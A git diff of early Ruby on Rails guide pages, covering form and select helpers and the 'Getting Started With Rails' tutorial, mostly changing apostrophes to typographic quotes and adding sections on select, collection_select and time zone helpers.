    A nice thing about f.text_field and other helper methods is that they will pre-fill the form control with the value read from the corresponding attribute in the model. For example, if we created the article instance by supplying an initial value for the title in the controller:

    @article = Article.new(:title => "Rails makes forms easy")
    -

    … the corresponding input will be rendered with a value:

    +

    ... the corresponding input will be rendered with a value:

    <input id="post_title" name="post[title]" size="30" type="text" value="Rails makes forms easy" />

    2.1. Relying on record identification

    -

    In the previous chapter we handled the Article model. This model is directly available to users of our application and, following the best practices for developing with Rails, we should declare it a resource.

    -

    When dealing with RESTful resources, our calls to form_for can get significantly easier if we rely on record identification. In short, we can just pass the model instance and have Rails figure out model name and the rest:

    +

    In the previous chapter we handled the Article model. This model is directly available to users of our application, so — following the best practices for developing with Rails — we should declare it a resource.

    +

    When dealing with RESTful resources, our calls to form_for can get significantly easier if we rely on record identification. In short, we can just pass the model instance and have Rails figure out model name and the rest:

    ## Creating a new article
    @@ -563,20 +579,20 @@ form_for(:article, @article, :url => article_path(@article), :method => "p
     # short-style:
     form_for(@article)
    -

    Notice how the short-style form_for invocation is conveniently the same, regardless of the record being new or existing. Record identification is smart enough to figure out if the record is new by asking record.new_record?.

    +

    Notice how the short-style form_for invocation is conveniently the same, regardless of the record being new or existing. Record identification is smart enough to figure out if the record is new by asking record.new_record?.

    - +
    Warning When you're using STI (single-table inheritance) with your models, you can't rely on record identification on a subclass if only their parent class is declared a resource. You will have to specify the model name, :url and :method explicitly.When you’re using STI (single-table inheritance) with your models, you can’t rely on record identification on a subclass if only their parent class is declared a resource. You will have to specify the model name, :url and :method explicitly.

    3. Making select boxes with ease

    -

    Select boxes in HTML require a significant amount of markup (one OPTION element for each option to choose from), therefore it makes the most sense for them to be dynamically generated from data stored in arrays or hashes.

    -

    Here is what our wanted markup might look like:

    +

    Select boxes in HTML require a significant amount of markup (one OPTION element for each option to choose from), therefore it makes the most sense for them to be dynamically generated from data stored in arrays or hashes.

    +

    Here is what our wanted markup might look like:

    <select name="city_id" id="city_id">
    @@ -586,15 +602,14 @@ form_for(@article)
    <option value="12">Berlin</option> </select>
    -

    Here we have a list of cities where their names are presented to the user, but internally we want to handle just their IDs so we keep them in value attributes. Let's see how Rails can help out here.

    +

    Here we have a list of cities where their names are presented to the user, but internally we want to handle just their IDs so we keep them in value attributes. Let’s see how Rails can help out here.

    3.1. The select tag and options

    -

    The most generic helper is select_tag, which — as the name implies — simply generates the SELECT tag that encapsulates the options:

    +

    The most generic helper is select_tag, which — as the name implies — simply generates the SELECT tag that encapsulates an options string:

    <%= select_tag(:city_id, '<option value="1">Lisabon</option>...') %>
    -

    This is a start, but it doesn't dynamically create our option tags. We had to pass them in as a string.

    -

    We can generate option tags with the options_for_select helper:

    +

    This is a start, but it doesn’t dynamically create our option tags. We can generate option tags with the options_for_select helper:

    <%= options_for_select([['Lisabon', 1], ['Madrid', 2], ...]) %>
    @@ -605,13 +620,13 @@ output:
     <option value="2">Madrid</option>
     ...
    -

    For input data we used a nested array where each element has two elements: visible value (name) and internal value (ID).

    -

    Now you can combine select_tag and options_for_select to achieve the desired, complete markup:

    +

    For input data we used a nested array where each item has two elements: option text (city name) and option value (city id).

    +

    Knowing this, you can combine select_tag and options_for_select to achieve the desired, complete markup:

    <%= select_tag(:city_id, options_for_select(...)) %>
    -

    Sometimes, depending on our application's needs, we also wish a specific option to be pre-selected. The options_for_select helper supports this with an optional second argument:

    +

    Sometimes, depending on our application’s needs, we also wish a specific option to be pre-selected. The options_for_select helper supports this with an optional second argument:

    <%= options_for_select(cities_array, 2) %>
    @@ -622,14 +637,95 @@ output:
     <option value="2" selected="selected">Madrid</option>
     ...
    -

    So whenever Rails sees that the internal value of an option being generated matches this value, it will add the selected attribute to that option.

    -

    3.2. Select boxes for dealing with models

    -

    Until now we've covered how to make generic select boxes, but in most cases our form controls will be tied to a specific database model. So, to continue from our previous examples, let's assume that we have a "Person" model with a city_id attribute.

    +

    So whenever Rails sees that the internal value of an option being generated matches this value, it will add the selected attribute to that option.

    +

    3.2. Select helpers for dealing with models

    +

    Until now we’ve covered how to make generic select boxes, but in most cases our form controls will be tied to a specific database model. So, to continue from our previous examples, let’s assume that we have a "Person" model with a city_id attribute.

    +

    Consistent with other form helpers, when dealing with models we drop the "_tag" suffix from select_tag that we used in previous examples:

    +
    +
    +
    # controller:
    +@person = Person.new(:city_id => 2)
    +
    +# view:
    +<%= select(:person, :city_id, [['Lisabon', 1], ['Madrid', 2], ...]) %>
    +
    +

    Notice that the third parameter, the options array, is the same kind of argument we pass to options_for_select. One thing that we have as an advantage here is that we don’t have to worry about pre-selecting the correct city if the user already has one — Rails will do this for us by reading from @person.city_id attribute.

    +

    As before, if we were to use select helper on a form builder scoped to @person object, the syntax would be:

    +
    +
    +
    # select on a form builder
    +<%= f.select(:city_id, ...) %>
    +
    +

    3.3. Option tags from a collection of arbitrary objects

    +

    Until now we were generating option tags from nested arrays with the help of options_for_select method. Data in our array were raw values:

    +
    +
    +
    <%= options_for_select([['Lisabon', 1], ['Madrid', 2], ...]) %>
    +
    +

    But what if we had a City model (perhaps an ActiveRecord one) and we wanted to generate option tags from a collection of those objects? One solution would be to make a nested array by iterating over them:

    +
    +
    +
    <% cities_array = City.find(:all).map { |city| [city.name, city.id] } %>
    +<%= options_for_select(cities_array) %>
    +
    +

    This is a perfectly valid solution, but Rails provides us with a less verbose alternative: options_from_collection_for_select. This helper expects a collection of arbitrary objects and two additional arguments: the names of the methods to read the option value and text from, respectively:

    -
    ...
    +
    <%= options_from_collection_for_select(City.all, :id, :name) %>
    +
    +

    As the name implies, this only generates option tags. A method to go along with it is collection_select:

    +
    +
    +
    <%= collection_select(:person, :city_id, City.all, :id, :name) %>
    +
    +

    To recap, options_from_collection_for_select are to collection_select what options_for_select are to select.

    +

    3.4. Time zone and country select

    +

    To leverage time zone support in Rails, we have to ask our users what time zone they are in. Doing so would require generating select options from a list of pre-defined TimeZone objects using collection_select, but we can simply use the time_zone_select helper that already wraps this:

    +
    +
    +
    <%= time_zone_select(:person, :city_id) %>
    +
    +

    There is also time_zone_options_for_select helper for a more manual (therefore more customizable) way of doing this. Read the API documentation to learn about the possible arguments for these two methods.

    +

    When it comes to country select, Rails used to have the built-in helper country_select but was extracted to a plugin. +TODO: plugin URL

    +
    +

    4. Miscellaneous

    +
    +

    4.1. File upload form

    +

    :multipart - If set to true, the enctype is set to "multipart/form-data".

    +

    4.2. Scoping out form controls with fields_for

    +

    Creates a scope around a specific model object like form_for, but doesn’t create the form tags themselves. This makes fields_for suitable for specifying additional model objects in the same form:

    +

    4.3. Making custom form builders

    +

    You can also build forms using a customized FormBuilder class. Subclass FormBuilder and override or define some more helpers, then use your custom builder. For example, let’s say you made a helper to automatically add labels to form inputs.

    +
    +
    +
    <% form_for :person, @person, :url => { :action => "update" }, :builder => LabellingFormBuilder do |f| %>
    +  <%= f.text_field :first_name %>
    +  <%= f.text_field :last_name %>
    +  <%= text_area :person, :biography %>
    +  <%= check_box_tag "person[admin]", @person.company.admin? %>
    +<% end %>
    +
    +
      +
    • +

      +form_for within a namespace +

      +
    • +
    +
    +
    +
    select_tag(name, option_tags = nil, html_options = { :multiple, :disabled })
    +
    +select(object, method, choices, options = {}, html_options = {})
    +options_for_select(container, selected = nil)
    +
    +collection_select(object, method, collection, value_method, text_method, options = {}, html_options = {})
    +options_from_collection_for_select(collection, value_method, text_method, selected = nil)
    +
    +time_zone_options_for_select(selected = nil, priority_zones = nil, model = ::ActiveSupport::TimeZone)
    +time_zone_select(object, method, priority_zones = nil, options = {}, html_options = {})
    -

    diff --git a/railties/doc/guides/html/getting_started_with_rails.html b/railties/doc/guides/html/getting_started_with_rails.html index ac16a79ac1..f0b30e6218 100644 --- a/railties/doc/guides/html/getting_started_with_rails.html +++ b/railties/doc/guides/html/getting_started_with_rails.html @@ -297,7 +297,7 @@ ul#navMain {
  • - What's Next? + What’s Next?
  • Changelog @@ -309,8 +309,8 @@ ul#navMain {

    Getting Started With Rails

    -

    This guide covers getting up and running with Ruby on Rails. After reading it, you should be familiar with:

    -
      +

      This guide covers getting up and running with Ruby on Rails. After reading it, you should be familiar with:

      +
      • Installing Rails, creating a new Rails application, and connecting your application to a database @@ -336,8 +336,8 @@ How to quickly generate the starting pieces of a Rails application.

      1. This Guide Assumes

      -

      This guide is designed for beginners who want to get started with a Rails application from scratch. It does not assume that you have any prior experience with Rails. However, to get the most out of it, you need to have some prerequisites installed:

      -
        +

        This guide is designed for beginners who want to get started with a Rails application from scratch. It does not assume that you have any prior experience with Rails. However, to get the most out of it, you need to have some prerequisites installed:

        +
        • The Ruby language @@ -354,8 +354,8 @@ A working installation of SQLite (preferred

        -

        It is highly recommended that you familiarize yourself with Ruby before diving into Rails. You will find it much easier to follow what's going on with a Rails application if you understand basic Ruby syntax. Rails isn't going to magically revolutionize the way you write web applications if you have no experience with the language it uses. There are some good free resources on the net for learning Ruby, including:

        -
          +

          It is highly recommended that you familiarize yourself with Ruby before diving into Rails. You will find it much easier to follow what’s going on with a Rails application if you understand basic Ruby syntax. Rails isn’t going to magically revolutionize the way you write web applications if you have no experience with the language it uses. There are some good free resources on the net for learning Ruby, including:

          +

        2. What is Rails?

        -

        Rails is a web development framework written in the Ruby language. It is designed to make programming web applications easier by making several assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks. Longtime Rails developers also report that it makes web application development more fun.

        -

        Rails is opinionated software. That is, it assumes that there is a best way to do things, and it's designed to encourage that best way - and in some cases discourage alternatives. If you learn "The Rails Way" you'll probably discover a tremendous increase in productivity. If you persist in bringing old habits from other languages to your Rails development, and trying to use patterns you learned elsewhere, you may have a less happy experience.

        -

        The Rails philosophy includes several guiding principles:

        -
          +

          Rails is a web development framework written in the Ruby language. It is designed to make programming web applications easier by making several assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks. Longtime Rails developers also report that it makes web application development more fun.

          +

          Rails is opinionated software. That is, it assumes that there is a best way to do things, and it’s designed to encourage that best way - and in some cases discourage alternatives. If you learn "The Rails Way" you’ll probably discover a tremendous increase in productivity. If you persist in bringing old habits from other languages to your Rails development, and trying to use patterns you learned elsewhere, you may have a less happy experience.

          +

          The Rails philosophy includes several guiding principles:

          +
          • -DRY - "Don't Repeat Yourself" - suggests that writing the same code over and over again is a bad thing. +DRY - "Don’t Repeat Yourself" - suggests that writing the same code over and over again is a bad thing.

          • -Convention Over Configuration - means that Rails makes assumptions about what you want to do and how you're going to do it, rather than letting you tweak every little thing through endless configuration files. +Convention Over Configuration - means that Rails makes assumptions about what you want to do and how you’re going to do it, rather than letting you tweak every little thing through endless configuration files.

          • @@ -396,8 +396,8 @@ REST is the best pattern for web applications - organizing your application arou

          2.1. The MVC Architecture

          -

          Rails is organized around the Model, View, Controller architecture, usually just called MVC. MVC benefits include:

          -
            +

            Rails is organized around the Model, View, Controller architecture, usually just called MVC. MVC benefits include:

            +
            • Isolation of business logic from the user interface @@ -415,14 +415,14 @@ Making it clear where different types of code belong for easier maintenance

            2.1.1. Models

            -

            A model represents the information (data) of the application and the rules to manipulate that data. In the case of Rails, models are primarily used for managing the rules of interaction with a corresponding database table. In most cases, one table in your database will correspond to one model in your application. The bulk of your application's business logic will be concentrated in the models.

            +

            A model represents the information (data) of the application and the rules to manipulate that data. In the case of Rails, models are primarily used for managing the rules of interaction with a corresponding database table. In most cases, one table in your database will correspond to one model in your application. The bulk of your application’s business logic will be concentrated in the models.

            2.1.2. Views

            -

            Views represent the user interface of your application. In Rails, views are often HTML files with embedded Ruby code that performs tasks related solely to the presentation of the data. Views handle the job of providing data to the web browser or other tool that is used to make requests from your application.

            +

            Views represent the user interface of your application. In Rails, views are often HTML files with embedded Ruby code that performs tasks related solely to the presentation of the data. Views handle the job of providing data to the web browser or other tool that is used to make requests from your application.

            2.1.3. Controllers

            -

            Controllers provide the "glue" between models and views. In Rails, controllers are responsible for processing the incoming requests from the web browser, interrogating the models for data, and passing that data on to the views for presentation.

            +

            Controllers provide the "glue" between models and views. In Rails, controllers are responsible for processing the incoming requests from the web browser, interrogating the models for data, and passing that data on to the views for presentation.

            2.2. The Components of Rails

            -

            Rails provides a full stack of components for creating web applications, including:

            -
              +

              Rails provides a full stack of components for creating web applications, including:

              +
              • Action Controller @@ -460,22 +460,22 @@ Active Support

              2.2.1. Action Controller

              -

              Action Controller is the component that manages the controllers in a Rails application. The Action Controller framework processes incoming requests to a Rails application, extracts parameters, and dispatches them to the intended action. Services provided by Action Controller include session management, template rendering, and redirect management.

              +

              Action Controller is the component that manages the controllers in a Rails application. The Action Controller framework processes incoming requests to a Rails application, extracts parameters, and dispatches them to the intended action. Services provided by Action Controller include session management, template rendering, and redirect management.

              2.2.2. Action View

              -

              Action View manages the views of your Rails application. It can create both HTML and XML output by default. Action View manages rendering templates, including nested and partial templates, and includes built-in AJAX support.

              +

              Action View manages the views of your Rails application. It can create both HTML and XML output by default. Action View manages rendering templates, including nested and partial templates, and includes built-in AJAX support.

              2.2.3. Active Record

              -

              Active Record is the base for the models in a Rails application. It provides database independence, basic CRUD functionality, advanced finding capabilities, and the ability to relate models to one another, among other services.

              +

              Active Record is the base for the models in a Rails application. It provides database independence, basic CRUD functionality, advanced finding capabilities, and the ability to relate models to one another, among other services.

              2.2.4. Action Mailer

              -

              Action Mailer is a framework for building e-mail services. You can use Action Mailer to send emails based on flexible templates, or to receive and process incoming email.

              +

              Action Mailer is a framework for building e-mail services. You can use Action Mailer to send emails based on flexible templates, or to receive and process incoming email.

              2.2.5. Active Resource

              -

              Active Resource provides a framework for managing the connection between business objects an RESTful web services. It implements a way to map web-based resources to local objects with CRUD semantics.

              +

              Active Resource provides a framework for managing the connection between business objects an RESTful web services. It implements a way to map web-based resources to local objects with CRUD semantics.

              2.2.6. Railties

              -

              Railties is the core Rails code that builds new Rails applications and glues the various frameworks together in any Rails application.

              +

              Railties is the core Rails code that builds new Rails applications and glues the various frameworks together in any Rails application.

              2.2.7. Active Support

              -

              Active Support is an extensive collection of utility classes and standard Ruby library extensions that are used in the Rails, both by the core code and by your applications.

              +

              Active Support is an extensive collection of utility classes and standard Ruby library extensions that are used in the Rails, both by the core code and by your applications.

              2.3. REST

              -

              The foundation of the RESTful architecture is generally considered to be Roy Fielding's doctoral thesis, Architectural Styles and the Design of Network-based Software Architectures. Fortunately, you need not read this entire document to understand how REST works in Rails. REST, an acronym for Representational State Transfer, boils down to two main principles for our purposes:

              -
                +

                The foundation of the RESTful architecture is generally considered to be Roy Fielding’s doctoral thesis, Architectural Styles and the Design of Network-based Software Architectures. Fortunately, you need not read this entire document to understand how REST works in Rails. REST, an acronym for Representational State Transfer, boils down to two main principles for our purposes:

                +
                • Using resource identifiers (which, for the purposes of discussion, you can think of as URLs) to represent resources @@ -487,11 +487,11 @@ Transferring representations of the state of that resource between system compon

                -

                For example, to a Rails application a request such as this:

                -

                DELETE /photos/17

                -

                would be understood to refer to a photo resource with the ID of 17, and to indicate a desired action - deleting that resource. REST is a natural style for the architecture of web applications, and Rails makes it even more natural by using conventions to shield you from some of the RESTful complexities.

                -

                If you’d like more details on REST as an architectural style, these resources are more approachable than Fielding’s thesis:

                -
                  +

                  For example, to a Rails application a request such as this:

                  +

                  DELETE /photos/17

                  +

                  would be understood to refer to a photo resource with the ID of 17, and to indicate a desired action - deleting that resource. REST is a natural style for the architecture of web applications, and Rails makes it even more natural by using conventions to shield you from some of the RESTful complexities.

                  +

                  If you’d like more details on REST as an architectural style, these resources are more approachable than Fielding’s thesis:

                  +
                  • A Brief Introduction to REST by Stefan Tilkov @@ -511,16 +511,15 @@ Transferring representations of the state of that resource between system compon

                  3. Creating a New Rails Project

                  -

                  If you follow this guide, you'll create a Rails project called blog, a (very) simple weblog. Before you can start building the application, you need to make sure that you have Rails itself installed.

                  +

                  If you follow this guide, you’ll create a Rails project called blog, a (very) simple weblog. Before you can start building the application, you need to make sure that you have Rails itself installed.

                  3.1. Installing Rails

                  -

                  In most cases, the easiest way to install Rails is to take advantage of RubyGems:

                  +

                  In most cases, the easiest way to install Rails is to take advantage of RubyGems:

                  -
                  $ gem install rails
                  -
                  +
                  $ gem install rails
                @@ -529,52 +528,48 @@ http://www.gnu.org/software/src-highlite --> There are some special circumstances in which you might want to use an alternate installation strategy:
                -
                  +
                  • -If you're working on Windows, you may find it easier to install Instant Rails. Be aware, though, that Instant Rails releases tend to lag seriously behind the actual Rails version. Also, you will find that Rails development on Windows is overall less pleasant than on other operating systems. If at all possible, we suggest that you install a Linux virtual machine and use that for Rails development, instead of using Windows. +If you’re working on Windows, you may find it easier to install Instant Rails. Be aware, though, that Instant Rails releases tend to lag seriously behind the actual Rails version. Also, you will find that Rails development on Windows is overall less pleasant than on other operating systems. If at all possible, we suggest that you install a Linux virtual machine and use that for Rails development, instead of using Windows.

                  • -If you want to keep up with cutting-edge changes to Rails, you'll want to clone the Rails source code from github. This is not recommended as an option for beginners, though. +If you want to keep up with cutting-edge changes to Rails, you’ll want to clone the Rails source code from github. This is not recommended as an option for beginners, though.

                  3.2. Creating the Blog Application

                  -

                  Open a terminal, navigate to a folder where you have rights to create files, and type:

                  +

                  Open a terminal, navigate to a folder where you have rights to create files, and type:

                  -
                  $ rails blog
                  -
                  -

                  This will create a Rails application that uses a SQLite database for data storage. If you prefer to use MySQL, run this command instead:

                  +
                  $ rails blog
              +

              This will create a Rails application that uses a SQLite database for data storage. If you prefer to use MySQL, run this command instead:

              -
              $ rails blog -d mysql
              -
              -

              And if you're using PostgreSQL for data storage, run this command:

              +
              $ rails blog -d mysql
          +

          And if you’re using PostgreSQL for data storage, run this command:

          -
          $ rails blog -d postgresql
          -
          -

          After you create the blog application, switch to its folder to continue work directly in that application:

          +
          $ rails blog -d postgresql
        +

        After you create the blog application, switch to its folder to continue work directly in that application:

        -
        $ cd blog
        -
        -

        In any case, Rails will create a folder in your working directory called blog. Open up that folder and explore its contents. Most of the work in this tutorial will happen in the app/ folder, but here's a basic rundown on the function of each folder that Rails creates in a new application by default:

        +
        $ cd blog
      +

      In any case, Rails will create a folder in your working directory called blog. Open up that folder and explore its contents. Most of the work in this tutorial will happen in the app/ folder, but here’s a basic rundown on the function of each folder that Rails creates in a new application by default:

      app/ @@ -621,7 +616,7 @@ cellspacing="0" cellpadding="4"> config/ @@ -629,7 +624,7 @@ cellspacing="0" cellpadding="4"> db/ @@ -700,9 +695,9 @@ cellspacing="0" cellpadding="4">
      - Contains the controllers, models, and views for your application. You'll focus on this folder for the remainder of this guide. + Contains the controllers, models, and views for your application. You’ll focus on this folder for the remainder of this guide.
      - Configure your application's runtime rules, routes, database, and more. + Configure your application’s runtime rules, routes, database, and more.
      - Shows your current database schema, as well as the database migrations. You'll learn about migrations shortly. + Shows your current database schema, as well as the database migrations. You’ll learn about migrations shortly.

      3.3. Configuring a Database

      -

      Just about every Rails application will interact with a database. The database to use is specified in a configuration file, config/database.yml. -If you open this file in a new Rails application, you'll see a default database configuration using SQLite. The file contains sections for three different environments in which Rails can run by default:

      -
        +

        Just about every Rails application will interact with a database. The database to use is specified in a configuration file, config/database.yml. +If you open this file in a new Rails application, you’ll see a default database configuration using SQLite. The file contains sections for three different environments in which Rails can run by default:

        +
        • The development environment is used on your development computer as you interact manually with the application @@ -720,8 +715,8 @@ The production environment is used when you deploy your application for

        3.3.1. Configuring a SQLite Database

        -

        Rails comes with built-in support for SQLite, which is a lightweight serverless database application. While a busy production environment may overload SQLite, it works well for development and testing. Rails defaults to using a SQLite database when creating a new project, but you can always change it later.

        -

        Here's the section of the default configuration file with connection information for the development environment:

        +

        Rails comes with built-in support for SQLite, which is a lightweight serverless database application. While a busy production environment may overload SQLite, it works well for development and testing. Rails defaults to using a SQLite database when creating a new project, but you can always change it later.

        +

        Here’s the section of the default configuration file with connection information for the development environment:

        development:
           adapter: sqlite3
           database: db/development.sqlite3
        -  timeout: 5000
        -
        -

        If you don't have any database set up, SQLite is the easiest to get installed. If you're on OS X 10.5 or greater on a Mac, you already have it. Otherwise, you can install it using RubyGems:

        -

        If you're not running OS X 10.5 or greater, you'll need to install the SQLite gem. Similar to installing Rails you just need to run:

        + timeout: 5000
    +

    If you don’t have any database set up, SQLite is the easiest to get installed. If you’re on OS X 10.5 or greater on a Mac, you already have it. Otherwise, you can install it using RubyGems:

    +

    If you’re not running OS X 10.5 or greater, you’ll need to install the SQLite gem. Similar to installing Rails you just need to run:

    -
    $ gem install sqlite3-ruby
    -
    +
    $ gem install sqlite3-ruby

    3.3.2. Configuring a MySQL Database

    -

    If you choose to use MySQL, your config/database.yml will look a little different. Here's the development section:

    +

    If you choose to use MySQL, your config/database.yml will look a little different. Here’s the development section:

    database: blog_development username: root password: - socket: /tmp/mysql.sock -
    -

    If your development computer's MySQL installation includes a root user with an empty password, this configuration should work for you. Otherwise, change the username and password in the development section as appropriate.

    + socket: /tmp/mysql.sock +

    If your development computer’s MySQL installation includes a root user with an empty password, this configuration should work for you. Otherwise, change the username and password in the development section as appropriate.

    3.3.3. Configuring a PostgreSQL Database

    -

    If you choose to use PostgreSQL, your config/database.yml will be customized to use PostgreSQL databases:

    +

    If you choose to use PostgreSQL, your config/database.yml will be customized to use PostgreSQL databases:

    encoding: unicode database: blog_development username: blog - password: -
    -

    Change the username and password in the development section as appropriate.

    + password: +

    Change the username and password in the development section as appropriate.

    3.3.4. Creating the Database

    -

    Now that you have your database configured, it's time to have Rails create an empty database for you. You can do this by running a rake command:

    +

    Now that you have your database configured, it’s time to have Rails create an empty database for you. You can do this by running a rake command:

    -
    $ rake db:create
    -
    +
    $ rake db:create

    4. Hello, Rails!

    -

    One of the traditional places to start with a new language is by getting some text up on screen quickly. To do that in Rails, you need to create at minimum a controller and a view. Fortunately, you can do that in a single command. Enter this command in your terminal:

    +

    One of the traditional places to start with a new language is by getting some text up on screen quickly. To do that in Rails, you need to create at minimum a controller and a view. Fortunately, you can do that in a single command. Enter this command in your terminal:

    -
    $ script/generate controller home index
    -
    +
    $ script/generate controller home index
    - +
    Tip If you're on Windows, or your Ruby is set up in some non-standard fashion, you may need to explicitly pass Rails script commands to Ruby: ruby script/generate controller home index.If you’re on Windows, or your Ruby is set up in some non-standard fashion, you may need to explicitly pass Rails script commands to Ruby: ruby script/generate controller home index.
    -

    Rails will create several files for you, including app/views/home/index.html.erb. This is the template that will be used to display the results of the index action (method) in the home controller. Open this file in your text editor and edit it to contain a single line of code:

    +

    Rails will create several files for you, including app/views/home/index.html.erb. This is the template that will be used to display the results of the index action (method) in the home controller. Open this file in your text editor and edit it to contain a single line of code:

    -
    <h1>Hello, Rails!</h1>
    -
    +
    <h1>Hello, Rails!</h1>

    4.1. Starting up the Web Server

    -

    You actually have a functional Rails application already - after running only two commands! To see it, you need to start a web server on your development machine. You can do this by running another command:

    +

    You actually have a functional Rails application already - after running only two commands! To see it, you need to start a web server on your development machine. You can do this by running another command:

    -
    $ script/server
    -
    -

    This will fire up the lightweight Webrick web server by default. To see your application in action, open a browser window and navigate to http://localhost:3000. You should see Rails' default information page:

    -

    +

    $ script/server
    +

    This will fire up the lightweight Webrick web server by default. To see your application in action, open a browser window and navigate to http://localhost:3000. You should see Rails' default information page:

    +

    Welcome Aboard screenshot

    @@ -826,39 +813,36 @@ http://www.gnu.org/software/src-highlite --> Tip -To stop the web server, hit Ctrl+C in the terminal window where it's running. In development mode, Rails does not generally require you to stop the server; changes you make in files will be automatically picked up by the server. +To stop the web server, hit Ctrl+C in the terminal window where it’s running. In development mode, Rails does not generally require you to stop the server; changes you make in files will be automatically picked up by the server.
    -

    The "Welcome Aboard" page is the smoke test for a new Rails application: it makes sure that you have your software configured correctly enough to serve a page. To view the page you just created, navigate to http://localhost:3000/home/index.

    +

    The "Welcome Aboard" page is the smoke test for a new Rails application: it makes sure that you have your software configured correctly enough to serve a page. To view the page you just created, navigate to http://localhost:3000/home/index.

    4.2. Setting the Application Home Page

    -

    You'd probably like to replace the "Welcome Aboard" page with your own application's home page. The first step to doing this is to delete the default page from your application:

    +

    You’d probably like to replace the "Welcome Aboard" page with your own application’s home page. The first step to doing this is to delete the default page from your application:

    -
    $ rm public/index.html
    -
    -

    Now, you have to tell Rails where your actual home page is located. Open the file config/routes.rb in your editor. This is your application's, routing file, which holds entries in a special DSL (domain-specific language) that tells Rails how to connect incoming requests to controllers and actions. At the bottom of the file you'll see the default routes:

    +
    $ rm public/index.html
    +

    Now, you have to tell Rails where your actual home page is located. Open the file config/routes.rb in your editor. This is your application’s, routing file, which holds entries in a special DSL (domain-specific language) that tells Rails how to connect incoming requests to controllers and actions. At the bottom of the file you’ll see the default routes:

    map.connect ':controller/:action/:id'
    -map.connect ':controller/:action/:id.:format'
    -
    -

    The default routes handle simple requests such as /home/index: Rails translates that into a call to the index action in the home controller. As another example, /posts/edit/1 would run the edit action in the posts controller with an id of 1.

    -

    To hook up your home page, you need to add another line to the routing file, above the default routes:

    +map.connect ':controller/:action/:id.:format' +

    The default routes handle simple requests such as /home/index: Rails translates that into a call to the index action in the home controller. As another example, /posts/edit/1 would run the edit action in the posts controller with an id of 1.

    +

    To hook up your home page, you need to add another line to the routing file, above the default routes:

    -
    map.root :controller => "home"
    -
    -

    This line illustrates one tiny bit of the "convention over configuration" approach: if you don't specify an action, Rails assumes the index action.

    -

    Now if you navigate to http://localhost:3000 in your browser, you'll see the home/index view.

    +
    map.root :controller => "home"
    +

    This line illustrates one tiny bit of the "convention over configuration" approach: if you don’t specify an action, Rails assumes the index action.

    +

    Now if you navigate to http://localhost:3000 in your browser, you’ll see the home/index view.

    @@ -870,27 +854,26 @@ http://www.gnu.org/software/src-highlite -->

    5. Getting Up and Running Quickly With Scaffolding

    -

    Rails scaffolding is a quick way to generate some of the major pieces of an application. If you want to create the models, views, and controllers for a new resource in a single operation, scaffolding is the tool for the job.

    +

    Rails scaffolding is a quick way to generate some of the major pieces of an application. If you want to create the models, views, and controllers for a new resource in a single operation, scaffolding is the tool for the job.

    6. Creating a Resource

    -

    In the case of the blog application, you can start by generating a scaffolded Post resource: this will represent a single blog posting. To do this, enter this command in your terminal:

    +

    In the case of the blog application, you can start by generating a scaffolded Post resource: this will represent a single blog posting. To do this, enter this command in your terminal:

    -
    $ script/generate scaffold Post name:string title:string content:text
    -
    +
    $ script/generate scaffold Post name:string title:string content:text
    - +
    Note While scaffolding will get you up and running quickly, the "one size fits all" code that it generates is unlikely to be a perfect fit for your application. In most cases, you'll need to customize the generated code. Many experienced Rails developers avoid scaffolding entirely, preferring to write all or most of their source code from scratch.While scaffolding will get you up and running quickly, the "one size fits all" code that it generates is unlikely to be a perfect fit for your application. In most cases, you’ll need to customize the generated code. Many experienced Rails developers avoid scaffolding entirely, preferring to write all or most of their source code from scratch.
    -

    The scaffold generator will build 13 files in your application, along with some folders, and edit one more. Here's a quick overview of what it creates:

    +

    The scaffold generator will build 13 files in your application, along with some folders, and edit one more. Here’s a quick overview of what it creates:

    6.1. Running a Migration

    -

    One of the products of the script/generate scaffold command is a database migration. Migrations are Ruby classes that are designed to make it simple to create and modify database tables. Rails uses rake commands to run migrations, and it's possible to undo a migration after it's been applied to your database. Migration filenames include a timestamp to ensure that they're processed in the order that they were created.

    -

    If you look in the db/migrate/20081013124235_create_posts.rb file (remember, yours will have a slightly different name), here's what you'll find:

    +

    One of the products of the script/generate scaffold command is a database migration. Migrations are Ruby classes that are designed to make it simple to create and modify database tables. Rails uses rake commands to run migrations, and it’s possible to undo a migration after it’s been applied to your database. Migration filenames include a timestamp to ensure that they’re processed in the order that they were created.

    +

    If you look in the db/migrate/20081013124235_create_posts.rb file (remember, yours will have a slightly different name), here’s what you’ll find:

    def self.down drop_table :posts end -end -
    -

    If you were to translate that into words, it says something like: when this migration is run, create a table named posts with two string columns (name and title) and a text column (content), and generate timestamp fields to track record creation and updating. You can learn the detailed syntax for migrations in the Rails Database Migrations guide.

    -

    At this point, you can use a rake command to run the migration:

    +end +

    If you were to translate that into words, it says something like: when this migration is run, create a table named posts with two string columns (name and title) and a text column (content), and generate timestamp fields to track record creation and updating. You can learn the detailed syntax for migrations in the Rails Database Migrations guide.

    +

    At this point, you can use a rake command to run the migration:

    $ rake db:create
    -$ rake db:migrate
    -
    +$ rake db:migrate
    - +
    Note Because you're working in the development environment by default, this command will apply to the database defined in the development section of your config/database.yml file.Because you’re working in the development environment by default, this command will apply to the database defined in the development section of your config/database.yml file.
    -

    To hook the posts up to the home page you've already created, you can add a link to the home page. Open /app/views/home/index.html.erb and modify it as follows:

    +

    To hook the posts up to the home page you’ve already created, you can add a link to the home page. Open /app/views/home/index.html.erb and modify it as follows:

    <h1>Hello, Rails!</h1>
     
    -<%= link_to "My Blog", posts_path %>
    -
    -

    The link_to method is one of Rails' built-in view helpers. It creates a hyperlink based on text to display and where to go - in this case, to the path for posts.

    +<%= link_to "My Blog", posts_path %> +

    The link_to method is one of Rails' built-in view helpers. It creates a hyperlink based on text to display and where to go - in this case, to the path for posts.

    6.3. Working with Posts in the Browser

    -

    Now you're ready to start working with posts. To do that, navigate to http://localhost:3000 and then click the "My Blog" link:

    -

    +

    Now you’re ready to start working with posts. To do that, navigate to http://localhost:3000 and then click the "My Blog" link:

    +

    Posts Index screenshot

    -

    This is the result of Rails rendering the index view of your posts. There aren't currently any posts in the database, but if you click the New Post link you can create one. After that, you'll find that you can edit posts, look at their details, or destroy them. All of the logic and HTML to handle this was built by the single script/generate scaffold command.

    +

    This is the result of Rails rendering the index view of your posts. There aren’t currently any posts in the database, but if you click the New Post link you can create one. After that, you’ll find that you can edit posts, look at their details, or destroy them. All of the logic and HTML to handle this was built by the single script/generate scaffold command.

    - +
